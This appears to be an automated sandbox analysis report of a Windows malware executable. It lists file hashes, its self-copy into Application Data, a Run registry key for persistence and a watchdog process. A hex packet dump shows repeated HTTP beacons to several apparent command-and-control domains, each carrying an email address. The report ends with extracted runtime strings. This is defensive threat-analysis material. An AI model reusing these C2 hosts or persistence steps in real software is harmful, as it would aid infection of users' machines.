Analysis Date: 2014-09-19 03:22:43

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 646f5dd778d4a967d724d543323cfb66 sha1: 1f0e6d1afab4ad1011cc0fe9e9050b2ae909f8e6 size: 291328
Section .rdata md5: b5602a3674d8942eef917e3ebae64243 sha1: feea15ecba6bbbe7b09651cd3f1b8fabd941329b size: 35328
Section md5: 35b48f0bbb4a98491aaaefd780e08780 sha1: 8ea9cf5523dad481cc8984420fe1e3f0c0a6e669 size: 99328
Timestamp: 2014-07-24 05:00:01
Packer: Microsoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Policy Storage PC Bus Browser Virtual ➝
C:\Documents and Settings\Administrator\Application Data\eppeezyzkhinosa\jcgjmrpmc.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\eppeezyzkhinosa\jcgjmrpmc.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\eppeezyzkhinosa\jcgjmrpmc.exe

↳ C:\Documents and Settings\Administrator\Application Data\eppeezyzkhinosa\jcgjmrpmc.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\eppeezyzkhinosa\jcgjmrpmc.tocfo
Creates File: C:\Documents and Settings\Administrator\Application Data\eppeezyzkhinosa\hftmfoevwg.exe
Creates File: \Device\Afd\Endpoint
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\eppeezyzkhinosa\jcgjmrpmc.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\eppeezyzkhinosa\jcgjmrpmc.exe"

Network Details:
Type: A
Flows TCP: 192.168.1.1:1031 ➝
Flows TCP: 192.168.1.1:1032 ➝
Flows TCP: 192.168.1.1:1033 ➝
Flows TCP: 192.168.1.1:1034 ➝
Flows TCP: 192.168.1.1:1035 ➝
Flows TCP: 192.168.1.1:1036 ➝
Flows TCP: 192.168.1.1:1037 ➝
Flows TCP: 192.168.1.1:1038 ➝
Flows TCP: 192.168.1.1:1039 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d726d61 726b776f 72644063   mail=rmarkword@c
0x00000020 (00032)   6f6d6361 73742e6e 6574266d 6574686f   omcast.net&metho
0x00000030 (00048)   643d706f 73742048 5454502f 312e300d   d=post HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2074 68696e6b 6265796f   .Host: thinkbeyo
0x00000070 (00112)   6e642e6e 65740d0a 0d0a                nd.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d726d61 726b776f 72644063   mail=rmarkword@c
0x00000020 (00032)   6f6d6361 73742e6e 6574266d 6574686f   omcast.net&metho
0x00000030 (00048)   643d706f 73742048 5454502f 312e300d   d=post HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2070 72657365 6e746265   .Host: presentbe
0x00000070 (00112)   696e672e 6e65740d 0a0d0a              ing.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d726d61 726b776f 72644063   mail=rmarkword@c
0x00000020 (00032)   6f6d6361 73742e6e 6574266d 6574686f   omcast.net&metho
0x00000030 (00048)   643d706f 73742048 5454502f 312e300d   d=post HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2063 68696566 6265696e   .Host: chiefbein
0x00000070 (00112)   672e6e65 740d0a0d 0a0d0a              g.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d726d61 726b776f 72644063   mail=rmarkword@c
0x00000020 (00032)   6f6d6361 73742e6e 6574266d 6574686f   omcast.net&metho
0x00000030 (00048)   643d706f 73742048 5454502f 312e300d   d=post HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2074 77656c76 65666f72   .Host: twelvefor
0x00000070 (00112)   65766572 2e6e6574 0d0a0d0a            ever.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d726d61 726b776f 72644063   mail=rmarkword@c
0x00000020 (00032)   6f6d6361 73742e6e 6574266d 6574686f   omcast.net&metho
0x00000030 (00048)   643d706f 73742048 5454502f 312e300d   d=post HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2068 6973746f 7279666f   .Host: historyfo
0x00000070 (00112)   72657665 722e6e65 740d0a0d 0a         rever.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d726d61 726b776f 72644063   mail=rmarkword@c
0x00000020 (00032)   6f6d6361 73742e6e 6574266d 6574686f   omcast.net&metho
0x00000030 (00048)   643d706f 73742048 5454502f 312e300d   d=post HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2077 65617468 6572666f   .Host: weatherfo
0x00000070 (00112)   72657665 722e6e65 740d0a0d 0a         rever.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d726d61 726b776f 72644063   mail=rmarkword@c
0x00000020 (00032)   6f6d6361 73742e6e 6574266d 6574686f   omcast.net&metho
0x00000030 (00048)   643d706f 73742048 5454502f 312e300d   d=post HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2063 6c617373 6265796f   .Host: classbeyo
0x00000070 (00112)   6e642e6e 65740d0a 0d0a0a0d 0a         nd.net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d726d61 726b776f 72644063   mail=rmarkword@c
0x00000020 (00032)   6f6d6361 73742e6e 6574266d 6574686f   omcast.net&metho
0x00000030 (00048)   643d706f 73742048 5454502f 312e300d   d=post HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2074 68696e6b 666c6f77   .Host: thinkflow
0x00000070 (00112)   65722e6e 65740d0a 0d0a0a0d 0a         er.net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d726d61 726b776f 72644063   mail=rmarkword@c
0x00000020 (00032)   6f6d6361 73742e6e 6574266d 6574686f   omcast.net&metho
0x00000030 (00048)   643d706f 73742048 5454502f 312e300d   d=post HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2070 72657365 6e74666c   .Host: presentfl
0x00000070 (00112)   6f776572 2e6e6574 0d0a0d0a 0a         ower.net.....

An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
bad allocation
bad exception
 Base Class Array'
 Class Hierarchy Descriptor'
 Complete Object Locator'
`copy constructor closure'
- CRT not initialized
dddd, MMMM dd, yyyy
`default constructor closure'
DOMAIN error
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
- floating point support not loaded
invalid string position
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
Microsoft Visual C++ Runtime Library
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
`omni callsig'
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
<program name unknown>
- pure virtual function call
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
TLOSS error
 Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
`vbase destructor'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'
